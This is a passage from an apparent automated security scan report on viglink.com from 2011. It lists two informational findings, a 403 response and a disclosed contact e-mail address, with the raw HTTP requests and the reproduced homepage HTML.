2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /users/action/login

/users/action/login CONFIRMED

https://www.viglink.com/users/action/login

Request

GET /users/action/login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=70d5567f87d0029654b87f692c749fac; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 388
Connection: close


<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>Access to the specified resource () has been forbidden.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.20</h3></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /

/

https://www.viglink.com/

Found E-mails

info@viglink.com

Request

GET / HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/,JSESSIONID=A06F0DDC982BCE0244F28C001F36E03D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4912
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>Affiliate Every Link on the Web with VigLink</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-1203998437.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h-337151240.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2 class="tagline"> The easiest way to monetize your content <a href="/users/signup" class="default button">Get Started Today</a></h2><ol id="viglink_steps"> <li class="write"><div>Create links in your blog or webpages as normal.</div></li> <li class="track"><div>When visitors click a link, we follow along.</div></li> <li class="earn"><div>If a purchase is made, you earn a commission.</div></li></ol><div> <div class="column span-33p"> <a href="http://www.youtube-nocookie.com/watch?v=SIYBfHUY6cg&amp;hl=en_US&amp;fs=1&amp;rel=0" class="fancybox swf"> <img src="/public/images/screenshots/video-thumb.jpg" width="268" height="173" alt=""/> </a> <h4>How It Works</h4> <p> If one of your users clicks through to a product or service and buys something, you earn a commission. You only pay us a share of what you earn. </p> </div> <div class="column span-33p"> <a href="/public/images/screenshots/dashboard-revenue.jpg" class="image fancybox" title="" rel="dashboard"> <img src="/public/images/screenshots/dashboard-thumb.jpg" width="268" height="173" alt=""/> <span class="zoom">Zoom</span> </a> <a href="/public/images/screenshots/dashboard-merchants.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-links.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-clicks.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <h4>Powerful Analytics</h4> <p> Track where users are going when they leave your site, understand which links and pages are driving the most revenue and to which merchants, and much more. </p> </div> <div class="column span-33p"> <a href="/partners" id="partners" class="image"> <img src="/public/images/partners_lg/amazon.png" alt="Amazon logo" width="182" height="35"/> <img src="/public/images/partners_lg/itunes.png" alt="iTunes logo" width="138" height="35"/> <img src="/public/images/partners_lg/walmart.png" alt="Walmart logo" width="167" height="41"/> <img src="/public/images/partners_lg/target.png" alt="Target logo" width="47" height="59"/> <img src="/public/images/partners_lg/newegg.png" alt="Newegg logo" width="81" height="39"/> <span class="zoom">More Partners</span> </a> <h4>Over 12,500 Merchants</h4> <p> Enjoy coverage of thousands of merchants across more than 20 affiliate networks. Automatically participate in all of them with one simple signup. </p> </div></div><div> <div class="column span-33p"> <h4>Easy to Install</h4> <p> Install VigLink by pasting a few lines of HTML into your site. VigLink also works with common platforms like WordPress, Blogger, TypePad and more. </p> </div> <div class="column span-33p"> <h4>Reliable on Any Size Site</h4> <p> VigLink works for any site, whether it gets 5 visits or 5 billion. Our system is designed to be totally failsafe. Even if our servers blew up, your links will keep working perfectly. </p> </div> <div class="column span-33p"> <h4>Already an Affiliate?</h4> <p> VigLink only affiliates links you've missed, or links in programs you're not already using. Links you've already affiliated are left alone. VigLink won't cost you a thing. </p> </div> <div class="column span-100p" id="signup"> <a href="/users/signup" class="default button">Get Started Today</a> </div> <div class="column span-100p" id="quotes"> <ul class="quotes"> <li> <blockquote> VigLink has been a true partner in every aspect of the word. They continue to push the envelope to improve the consumer experience, while delivering high quality traffic to our site. I would recommend VigLink for any blog/forum that puts the consumer first. </blockquote> <p> <a href="http://motors.ebay.com"> <img src="/public/images/quotes/logo-ebaymotors.png" width="164" height"38" alt="Ebay Motors logo"/> <span class="who">Famous Rhodes</span> <span class="title">Director of eBay Motors</span> </a> </p></li><li> <blockquote> VigLink's technology is easy to install and instantly provides detailed reporting of revenue that you weren't making before. Beyond that, the technical team has been highly competent and responsive to needed changes - there's not a lot more we could ask for. We'll look forward to more products from this team in the future. </blockquote> <p> <a href="http://www.huddler.com"> <img src="/public/images/quotes/logo-huddler.png" width="162" height"49" alt="Huddler logo"/> <span class="who">Dan Gill</span> <span class="title">CEO Huddler.com</span> </a> </p></li><li> <blockquote> From the first day we started with VigLink, we have never looked back, or elsewhere, for real time commission link management. </blockquote> <p> <a href="http://www.avsforum.com"> <img src="/public/images/quotes/logo-avsforum.png" width="182" height"33" alt="AVS Forums logo"/> <span class="who">David Bott</span> <span class="title">AVSForum.com, Inc.</span> </a> </p></li><li> <blockquote> VigLink has been a great and responsive partner during our nearly 2 year partnership. Their innovative products and service have provided an additional channel of monetization without interfering with our core user experience. The additional value they bring to the table is a willingness to collaborate and assist us in developing new monetization opportunities. </blockquote> <p> <a href="http://www.internetbrands.com/"> <img src="/public/images/quotes/logo-internetbrands.png" width="109" height"49" alt="Internet Brands logo"/> <span class="who">Alvin Fong</span> <span class="title">Director, Internet Brands</span> </a> </p></li><li> <blockquote> VigLink has now become an essential part of our business strategy and a major revenue stream. A truly innovative way to monetize any web site quickly without the addition of traditional intrusive display ads. </blockquote> <p> <a href="http://www.forumfoundry.com/"> <img src="/public/images/quotes/logo-forumfoundry.png" width="80" height"55" alt="Forum Foundry logo"/> <span class="who">Dan Kiehl</span> <span class="title">Forumfoundry.com</span> </a> </p></li><li> <blockquote> VigLink is a fast, automated way for Bloggers to partner with Google Affiliate Network. It takes minimal effort for Bloggers to monetize their content through Google Affiliate Network links and we've already seen VigLink installs result in new productive, affiliate publishers. </blockquote> <p> <a href="http://www.connectcommerce.com/"> <span class="who">Mari Condon</span> <span class="title">Publisher Account Manager,</span> <span class="title">Google Affiliate Network</span> </a> </p></li><li> <blockquote> I was skeptical at first how much VigLink could do for me. After almost a year of putting it off I decided to give it a try. Now I'm very sorry I lost a year of significant revenue. Installation takes a minute, nice Control Panel, no noticeable difference for your users, and best of all great money paid on time! </blockquote> <p> <a href="http://www.ferrarichat.com/"> <img src="/public/images/quotes/logo-ferrarichat.png" width="147" height"38" alt="Ferrari Chat logo"/> <span class="who">Rob Lay</span> <span class="title">Owner, Ferrarichat.com</span> </a> </p></li><li> <blockquote> VigLink is a long-standing strategic partner with eBay, eBay Motors, and eBay Marketing. We consider VigLink to be one of the most relevant and efficient sub-affiliate partners we have in our program today. Their work to build unique incremental tools with eBay APIs and to standardize implementations across many different kinds of platforms sets them apart as an innovative industry leader in the internet marketing space. </blockquote> <p> <a href="http://www.schaafco.com/"> <img src="/public/images/quotes/logo-schaaf.png" width="107" height"47" alt="Schaaf Partnercentric logo"/> <span class="title">Schaaf-PartnerCentric/eBay</span> </a> </p></li><li> <blockquote> I was skeptical about the VigLink program when it was presented. I checked with two more technical advisers who said it looked OK. I signed up, put in the code in my Forum software and was shocked to see the income the first month. I've been receiving three and sometimes four figures of income each month. It's a great deal. </blockquote> <p> <a href="http://www.askandyaboutclothes.com/"> <span class="who">Andy Gilchrist</span> <span class="title">Owner, AskAndyAboutClothes.com</span> </a> </p></li><li> <blockquote> I have been with VigLink one week and so far, I love it! I don't have time to affiliate all my links when I don't know which blog posts will generate traffic and which ones don't. VigLink gives me the option to focus on good content, and traffic building, not link building. </blockquote> <p> <a href="http://www.morewithlesstoday.com/"> <span class="who">Lori Felix</span> <span class="title">Blogger, More With Less Today</span> </a> </p></li></ul> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>